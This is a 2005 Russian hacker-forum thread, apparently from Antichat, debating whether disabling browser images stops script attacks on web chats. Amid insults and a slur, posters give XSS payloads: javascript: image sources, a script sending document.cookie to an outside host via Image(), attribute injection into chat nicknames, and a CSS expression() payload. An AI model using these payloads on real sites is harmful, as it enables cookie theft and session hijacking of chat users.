Чаты Защита от Inet Cracká

Discussion in 'Веб-уязвимости' started by AGRESSOR, 16 Mar 2005.

Thread Status:
Not open for further replies.
  1. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    хехе, посмеялся)
    А если по делу, ты лучше слушай что тебе советуют. дело в том что твои глуповатые соображения давно грамотно описаны в мануалах по клиентским скриптам и всем известны
     
  2. AGRESSOR

    AGRESSOR Member

    Joined:
    14 Mar 2005
    Messages:
    12
    Likes Received:
    8
    Reputations:
    0
    БУГА-ГА-ГА-ГА!!!! БУ-ГА-ГА!! И ЭТО МНЕ ГОВОРИТ ЧЕЛОВЕК, КОТОРЫЙ НЕ УМЕЕТ ОТКЛЮЧАТЬ КАРТИНКИ В МОЗИЛЛЕ!!!! :p :p :D Т
     
  3. White Jordan

    White Jordan Guest

    Reputations:
    0
    Не знаю о чём ты. Он тут самый лучший хакер на античате. Если бы ты понимал с кем ты говоришь ты бы слушал его советы и так бы не говорил.
     
  4. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    гы гы гы иди от ИнетКрэка защиту ищи, лолик))
     
  5. AGRESSOR

    AGRESSOR Member

    Joined:
    14 Mar 2005
    Messages:
    12
    Likes Received:
    8
    Reputations:
    0
    ХО-ХО-ХО))))))))))) Я НЕ УСТАЮ С СЕБЯ ПОРАЖАТЬСЯ)))) ТОЛЬКО ТАКОЙ ОТЪЯВЛЕННЫЙ ЧЁРТ, КАК Я, МОЖЕТ ЗАЛУПИТЬ НА САМОГО ГЛАВНОГО БУКВАЛЬНО С ПЕРВОГО ЧАСА ЗНАКОМСТВА, ТАК ЧТО Я ТУТ САМЫЙ КРУТОЙ))) НУ А РАЗ УЖ НАШ МЕГА-ХАКЕР ЗАПАМЯТОВАЛ ОБ КАРТИНКАХ МОЗИЛЛЫ, ТО ВСЁ-РАВНО.
    1) НЕ-А. ОТКЛЮЧЕНИЕ КАРТИНОК - НЕ ПОМОГАЕТ, ПРОБОВАЛИ УЖЕ. ПРАВДА, САМ СКРИПТ ОТОБРАЖАЕТСЯ В ЧАТ-ЛИСТЕ ДЕЙСТВИТЕЛЬНО КАК НЕРАСКРЫТАЯ КАРТИНКА.
    2) ВСЁ-ТАКИ ЕСТЬ РЕДКИЕ СКРИПТЫ, НА КОТОРЫХ ЭТО КАНАЕТ, НО, ВИДИМО, У НАС ТАКИМИ - НЕ ГАСЯТ. ГАСЯТ - ДРУГИМИ.
     
  6. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Agressor
    ну хуле, теперь все понятно ты не отъявленый черт а отчаяный пидар и дурачок))

    White Jordan насчет самого лучшего хакера - разумеется не я, это даже как-то не очень смешно
     
  7. White Jordan

    White Jordan Guest

    Reputations:
    0
    Я не говорил это для смеха. Я читал очень многие вещи на античате. На форуме тоже много читал сравнив всех, Я просто пришол к выводу из фактов что ты и есть самый лучший хакер на античате. Это совсем не для смеха было сказанно. Просто когда человек достигает высоких уровней независимо от специальности которой он занимается, он не замечает свой уровень. Это уже даказынный факт. Ты просто не замечаешь себя и в себе что и даказывает правильность моей теории что ты самый лучший хакер на античате. Плюс достаточно прочитать твои стать, посты т.д. и сравнив их со статьями других людей, (Если человек не ослеп) сразу будет видно что это так.
     
  8. KEZ

    KEZ Guest

    Reputations:
    0
    Да, White Jordan, ты у нас филосов))

    Вообщето у тебя репутация клоуна
     
  9. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Ладно, давай разберемся ...
    Отключение картинок означает что браузер не будет обрабатывать атрибут src тега IMG вот и все.
    Например
    HTML:
    <img src=javascript:alert('ok')>
    
    Такой способ загрузки скрипта, естественно не сработает, как и этот:
    HTML:
    <script>img=new Image();img.src="javascript:alert();"</script>
    
    Но скрипт можно запустить не только с помощью картинок, так ведь ? Что мешает использовать IFRAME или Onload ? Я говрю про пример скальпеля ... Я не знаю, что ты зациклился на этом img ...
     
  10. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Если речь идет о примере
    HTML:
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> 
    То в таком случае как раз браузер ЗНАЕТ что загружает картинку, поскольку загрузка производится через объект Image(). Т.е. отключение отображения картинок приводит к тому, что этот скрипт не работает.
     
  11. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    В случае скальпеля это было возможно(правда все использовали именно Image()). Но в других случаях тэги не пропускаются обычно, мы используем атрибуты. И значение атрибута как раз -- скрипт. <font color="#000000" ВПИСЫВАЕМ_СВОИ_ЗНАЧЕНИЯ>НИК_В_ЧАТЕ</font>
    ВПИСЫВАЕМ_СВОИ_ЗНАЧЕНИЯ - это style или например onMouseOver. Лучше естественно style. А раз стиль, то единственный фактически стандартный способ запустить скрипт background. это только кажется что способов куча, а на практике восновном связано с графикой. Приблизительно так.
    http://antichat.ru/crackchat/index.html
     
    #31 JazzzSummerMan, 22 Mar 2005
    Last edited: 22 Mar 2005
  12. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    На самом деле есть хороший способ не связанный с графикой: функция expression.)
    Например:
    Code:
    <font style=top:expression(alert())>XSS</font>
    
     
    #32 Algol, 22 Mar 2005
    Last edited by a moderator: 27 Mar 2005
  13. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    совершенно верно). жаль он поддерживается Ie только
     
Thread Status:
Not open for further replies.